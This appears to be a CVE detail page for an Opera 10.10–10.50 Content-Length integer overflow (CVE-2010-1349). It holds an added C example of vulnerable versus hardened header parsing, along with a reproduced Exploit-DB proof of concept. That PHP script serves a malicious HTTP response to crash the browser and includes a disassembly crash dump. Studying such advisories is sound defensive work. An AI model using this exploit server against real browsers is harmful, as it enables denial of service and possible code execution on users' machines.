CVE-2010-1349 : Detail

43.09% | V3 | Network
Published: 2010-04-12 16h00 +00:00
Last modified: 2017-08-16 12h57 +00:00

CVE Description

Integer overflow in Opera 10.10 through 10.50 allows remote attackers to execute arbitrary code via a large Content-Length value, which triggers a heap overflow.
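The description names the whole chain (oversized Content-Length, integer overflow, heap overflow) without showing it. The following is an added illustration of that chain in C; it is not code from this page, from the exploit author or from Opera. Function names, the malloc(n + 1) / memcpy(n) shape and the MAX_BODY cap are assumptions for illustration only; the page does not identify which Opera routine mis-parsed the header. What the page does show, in the PoC's crash dump further down, is a fault inside a REP MOVS with ECX=3FFF3ABE dwords (0xFFFCEAF8 bytes), which is consistent with a negative 32-bit length being reinterpreted as an unsigned copy count, and that is the failure mode the example models.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern (hypothetical, not Opera's code): digits accumulated into
 * a 32-bit int with no range check. Arithmetic is done in uint32_t so the wrap
 * is well-defined C; the final cast reinterprets the bit pattern as signed. */
static int32_t parse_content_length_unchecked(const char *s)
{
    uint32_t n = 0;
    for (; *s >= '0' && *s <= '9'; s++)
        n = n * 10u + (uint32_t)(*s - '0');   /* silently wraps modulo 2^32 */
    return (int32_t)n;
}

/* What a 32-bit build would do next, computed without performing the copy.
 * Two failure modes fall out of one wrapped value:
 *  - wrapped small: a tiny buffer is allocated for a body that is not tiny;
 *  - wrapped negative: a negative count reaches memcpy()/REP MOVS as a ~4 GB
 *    unsigned count (the shape of the crash in the PoC on this page). */
struct copy_plan {
    int32_t  parsed;       /* value the unchecked parser produced */
    uint32_t alloc_bytes;  /* handed to malloc(): parsed + 1 (room for a NUL) */
    uint32_t copy_bytes;   /* handed to memcpy(): (unsigned) parsed */
    int      overflow;     /* copy_bytes > alloc_bytes: write past the chunk */
};

static struct copy_plan plan_copy_unchecked(const char *content_length)
{
    struct copy_plan p;
    p.parsed      = parse_content_length_unchecked(content_length);
    p.alloc_bytes = (uint32_t)p.parsed + 1u;   /* 0xFFFFFFFF + 1 wraps to malloc(0) */
    p.copy_bytes  = (uint32_t)p.parsed;
    p.overflow    = p.copy_bytes > p.alloc_bytes;
    return p;
}

/* Hardened parser: digits only, strtoull() with errno/endptr checks, an
 * explicit policy cap, size_t result. Returns 0 on success, -1 on anything
 * malformed or out of range; the caller must then drop the response rather
 * than guess. MAX_BODY is an arbitrary example limit (assumption). */
#define MAX_BODY (64u * 1024u * 1024u)

static int parse_content_length_checked(const char *s, size_t *out)
{
    char *end;
    unsigned long long v;

    if (*s < '0' || *s > '9')                  /* rejects "", "-5", " 12" */
        return -1;
    errno = 0;
    v = strtoull(s, &end, 10);
    if (errno == ERANGE)                       /* does not fit unsigned long long */
        return -1;
    if (*end != '\0' && *end != '\r' && *end != '\n')
        return -1;                             /* trailing junk such as "12abc" */
    if (v > MAX_BODY)                          /* fits the type, violates policy */
        return -1;
    *out = (size_t)v;
    return 0;
}

/* The checked parser's result as one value: the length, or -1 if rejected. */
static long long checked_value(const char *s)
{
    size_t n = 0;
    return parse_content_length_checked(s, &n) == 0 ? (long long)n : -1LL;
}

/* A PoC-style value, constructed here and far shorter than the exploit's:
 * `nines` '9' characters followed by "666". Returns 1 if the checked parser
 * rejects it, which it must once the run no longer fits unsigned long long. */
static int poc_length_is_rejected(size_t nines)
{
    char buf[128];
    if (nines > sizeof buf - 4) nines = sizeof buf - 4;
    memset(buf, '9', nines);
    memcpy(buf + nines, "666", 4);
    return checked_value(buf) == -1LL;
}

int main(void)
{
    struct copy_plan p = plan_copy_unchecked("4294967295");   /* 2^32 - 1 */
    printf("unchecked: parsed=%d malloc(%u) memcpy(%u) overflow=%d\n",
           (int)p.parsed, (unsigned)p.alloc_bytes, (unsigned)p.copy_bytes, p.overflow);
    printf("checked \"4294967295\": %lld\n", checked_value("4294967295"));
    printf("checked \"1234\\r\\n\": %lld\n", checked_value("1234\r\n"));
    printf("checked PoC-style (40 nines + 666) rejected: %d\n", poc_length_is_rejected(40));
    return 0;
}
```

The point of the checked parser is that there is no "best effort" path: a value that does not fit, has trailing characters, or exceeds the policy cap is rejected outright, because any numeric result the code could produce from such input is one an attacker chose.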

CVE Information

Related Weaknesses

CWE-ID    Weakness Name                 Source
CWE-189   Category: Numeric Errors
          Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics   Score   Severity   CVSS Vector                   Source
V2        10.0    High       AV:N/AC:L/Au:N/C:C/I:C/A:C    [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile has an EPSS score higher than that of 95% of all other CVEs, so the percentile is the way to compare one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID : 11622

Publication date : 2010-03-02 23h00 +00:00
Author : Marcin Ressel
EDB Verified : No

<?php
/*
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 *-------------------------------------------------------------------------------
 * Opera 10.10 - 10.50
 * Title: Integer overflow leading to out-of-bounds array access R/W
 * 0day PoC
 * Author: Marcin Ressel aka ~echo
 * Date: 3.03.2010
 * Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
 * Version: Tested on 10.10, 10.50 but I think other versions are vulnerable too
 * Platform: Windows XP Home SP2 PL
 * Music: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (got me excited)
 * Contact: [email protected]
 *
 * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 *
 * Exception: Access violation when writing to [01A23000]
 *
 * Registers:
 *   EAX 03D89DF2
 *   ECX 3FFF3ABE
 *   EDX 00000002
 *   EBX FFFFFFFF
 *   ESP 0012F158
 *   EBP 0012F160
 *   ESI 03DBB2F8
 *   EDI 01A23000
 *   EIP 6781E0BA Opera_12.6781E0BA
 *
 * DUMP Function:
 *   6781E060  55                PUSH EBP
 *   6781E061  8BEC              MOV EBP,ESP
 *   6781E063  57                PUSH EDI
 *   6781E064  56                PUSH ESI
 *   6781E065  8B75 0C           MOV ESI,DWORD PTR SS:[EBP+C]
 *   6781E068  8B4D 10           MOV ECX,DWORD PTR SS:[EBP+10]
 *   6781E06B  8B7D 08           MOV EDI,DWORD PTR SS:[EBP+8]
 *   6781E06E  8BC1              MOV EAX,ECX
 *   6781E070  8BD1              MOV EDX,ECX
 *   6781E072  03C6              ADD EAX,ESI
 *   6781E074  3BFE              CMP EDI,ESI
 *   6781E076  76 08             JBE SHORT Opera_12.6781E080
 *   6781E078  3BF8              CMP EDI,EAX
 *   6781E07A  0F82 A4010000     JB Opera_12.6781E224
 *   6781E080  81F9 00010000     CMP ECX,100
 *   6781E086  72 1F             JB SHORT Opera_12.6781E0A7
 *   6781E088  833D 882AF167 00  CMP DWORD PTR DS:[67F12A88],0
 *   6781E08F  74 16             JE SHORT Opera_12.6781E0A7
 *   6781E091  57                PUSH EDI
 *   6781E092  56                PUSH ESI
 *   6781E093  83E7 0F           AND EDI,0F
 *   6781E096  83E6 0F           AND ESI,0F
 *   6781E099  3BFE              CMP EDI,ESI
 *   6781E09B  5E                POP ESI
 *   6781E09C  5F                POP EDI
 *   6781E09D  75 08             JNZ SHORT Opera_12.6781E0A7
 *   6781E09F  5E                POP ESI
 *   6781E0A0  5F                POP EDI
 *   6781E0A1  5D                POP EBP
 *   6781E0A2  ^E9 88CEFFFF      JMP Opera_12.6781AF2F
 *   6781E0A7  F7C7 03000000     TEST EDI,3
 *   6781E0AD  75 15             JNZ SHORT Opera_12.6781E0C4
 *   6781E0AF  C1E9 02           SHR ECX,2
 *   6781E0B2  83E2 03           AND EDX,3
 *   6781E0B5  83F9 08           CMP ECX,8
 *   6781E0B8  72 2A             JB SHORT Opera_12.6781E0E4
 *   6781E0BA  F3:A5             REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]   <-- BUG
 *   6781E0BC  FF2495 D4E18167   JMP DWORD PTR DS:[EDX*4+6781E1D4]
 *   6781E0C3  90                NOP
 *   6781E0C4  8BC7              MOV EAX,EDI
 *   6781E0C6  BA 03000000       MOV EDX,3
 *   6781E0CB  83E9 04           SUB ECX,4
 *   6781E0CE  72 0C             JB SHORT Opera_12.6781E0DC
 *   6781E0D0  83E0 03           AND EAX,3
 *   6781E0D3  03C8              ADD ECX,EAX
 *   6781E0D5  FF2485 E8E08167   JMP DWORD PTR DS:[EAX*4+6781E0E8]
 *   6781E0DC  FF248D E4E18167   JMP DWORD PTR DS:[ECX*4+6781E1E4]
 *   6781E0E3  90                NOP
 *   6781E0E4  FF248D 68E18167   JMP DWORD PTR DS:[ECX*4+6781E168]
 *   ...
 *---------------------------------------------------------------------------
 * BREAK AT 6781E0BA
 *   ECX=3FFF3ABE (decimal 1073691326.)
 *   DS:[ESI]=[03DBB2F8]=00000000
 *   ES:[EDI]=[01A23000]=???
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 */

// Platform detection from PHP_OS (the original read $_ENV['OS'], which is
// empty unless variables_order includes "E").
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
    define('OS', 'win');
} else {
    define('OS', 'nix');
}

// The sockets extension registers itself as "sockets" (the original tested
// for "php_sockets", which never matches). dl() only works from the CLI.
if (!extension_loaded('sockets')) {
    if (((OS == 'win') && !@dl('php_sockets.dll')) || ((OS == 'nix') && !@dl('sockets.so'))) {
        die('fatal php_sockets.[dll/so] not loaded' . "\r\n");
    }
}

/* Generated by my own fuzzer */
// Malicious HTTP response handed to the browser as soon as it connects.
$EVIL = 'HTTP/1.1 200 ok'."\r\n".
    'Transfer-Encoding: identity'."\r\n".
    'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
    'Server: moj zuy server'."\r\n".
    'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
    'Content-Location: file://C:/boot.ini'."\r\n".
    'Vary:negotiate,accept-language,accept-charset'."\r\n".
    'Tcn: choice'."\r\n".
    'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
    'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
    'Accept-Ranges: bytes'."\r\n".
    'Cache-Control: max-age=0'."\r\n".
    'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
    'Content-Encoding: identity'."\r\n".
    // Trigger: a Content-Length far beyond any integer type. The literal runs
    // over several lines in this listing.
'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n". 'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n". 'Keep-Alive: timeout=15, max=300'."\r\n". 'Connection: keep-alive'."\r\n". 'Content-Type: text/html; charset=iso-8859-2'."\r\n". 'Age: 1'."\r\n". 'Allow: GET,HEAD'."\r\n". 'Content-Disposition: inline'."\r\n". 'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n". 'Warning: 199 Miscellaneous warning'."\r\n". 'Trailer: Max-Forwards'."\r\n". 'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n". 'Content-Range: bytes 21010-47021/47022'."\r\n". 
    'Content-Language: pl'."\r\n\r\n".
    '<html><head></head><body style="background-color:red;color:white;text-align:center;">'.
    '<b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';

// The Content-Length literal above is wrapped across several lines in this
// listing; drop the bare line feeds that wrapping introduced (the "\r\n"
// header terminators are left alone) so the header goes out as one line.
$EVIL = preg_replace('/(?<!\r)\n/', '', $EVIL);

// Optional "-port N" argument; defaults to 81 (the original left $PORT
// undefined when arguments were given without -port).
$PORT = 81;
for ($i = 1; $i + 1 < $argc; $i += 2) {
    if (($argv[$i] == '-port') && ((int)$argv[$i + 1] > 0)) {
        $PORT = (int)$argv[$i + 1];
    }
}

if (!($SOCKET = socket_create_listen($PORT))) {
    die('fatal socket init failed' . "\r\n");
}
socket_set_option($SOCKET, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 3, "usec" => 0));
echo 'SOCKET READY AT PORT ' . $PORT . "\r\n" . 'Now connect here via opera' . "\r\n";

if ($CONNECT = socket_accept($SOCKET)) {
    $recv_buffer = null;
    echo 'Connection ok ' . "\r\n";
    // Read the first 8 bytes of the browser's request, then answer with the
    // malicious response regardless of what was asked for.
    if (socket_recv($CONNECT, $recv_buffer, 8, MSG_WAITALL)) {
        if (!@socket_write($CONNECT, $EVIL)) {
            socket_close($CONNECT);
            socket_close($SOCKET);
            die('I cant send payload !' . "\r\n");
        }
    } else {
        echo 'Something wrong with client side' . "\r\n";
    }
    usleep(120000);
    socket_close($CONNECT);
    socket_close($SOCKET);
}
echo 'OK ya browser must be death now' . "\r\n" . 'Have a nice day lol' . "\r\n";
//[2010-03-03 20:47:46]
//I could be a million-dollar man ;=
?>

Products Mentioned

Configuration 0

Opera >> Opera_browser >> Version 10.10
Opera >> Opera_browser >> Version 10.50
    Microsoft >> Windows >> Version *

References

http://www.securityfocus.com/bid/38519
Tags: vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1023690
Tags: vdb-entry, x_refsource_SECTRACK
http://www.exploit-db.com/exploits/11622
Tags: exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/62714
Tags: vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2010/0529
Tags: vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/38820
Tags: third-party-advisory, x_refsource_SECUNIA